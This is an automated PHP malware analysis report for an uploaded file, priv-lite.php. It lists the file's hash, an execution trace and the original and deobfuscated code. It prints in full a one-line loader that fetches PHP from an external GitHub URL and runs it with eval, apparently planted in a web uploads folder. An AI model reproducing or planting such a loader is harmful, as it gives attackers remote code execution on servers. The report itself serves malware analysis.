PHP Malware Analysis
priv-lite.php
md5: 129533519a1ac7b23a834012aea1f703
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Execution
- eval (Deobfuscated, Original)
Files
- file_get_contents (Deobfuscated, Original)
URLs
- https://raw.githubusercontent.com/mecus7/priv/main/priv (Deobfuscated, Original, Traces)
Deobfuscated PHP code
<?php
eval("?>" . file_get_contents("https://raw.githubusercontent.com/mecus7/priv/main/priv"));
?> Execution traces
data/traces/129533519a1ac7b23a834012aea1f703_trace-1676239919.012.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 20:12:24.909830]
1 0 1 0.000150 393528
1 3 0 0.000197 393768 {main} 1 /var/www/html/uploads/priv-lite.php 0 0
2 4 0 0.000214 393768 file_get_contents 0 /var/www/html/uploads/priv-lite.php 3 1 'https://raw.githubusercontent.com/mecus7/priv/main/priv'
2 4 1 0.037512 397016
2 4 R FALSE
2 5 0 0.037575 397376 eval 1 '?>' /var/www/html/uploads/priv-lite.php 3 0
2 5 1 0.037595 397376
1 3 1 0.037608 397088
0.037665 317368
TRACE END [2023-02-12 20:12:24.947375]
Generated HTML code
<html><head></head><body></body></html>Original PHP code
<?php eval("?>".file_get_contents("https://raw.githubusercontent.com/mecus7/priv/main/priv"));?>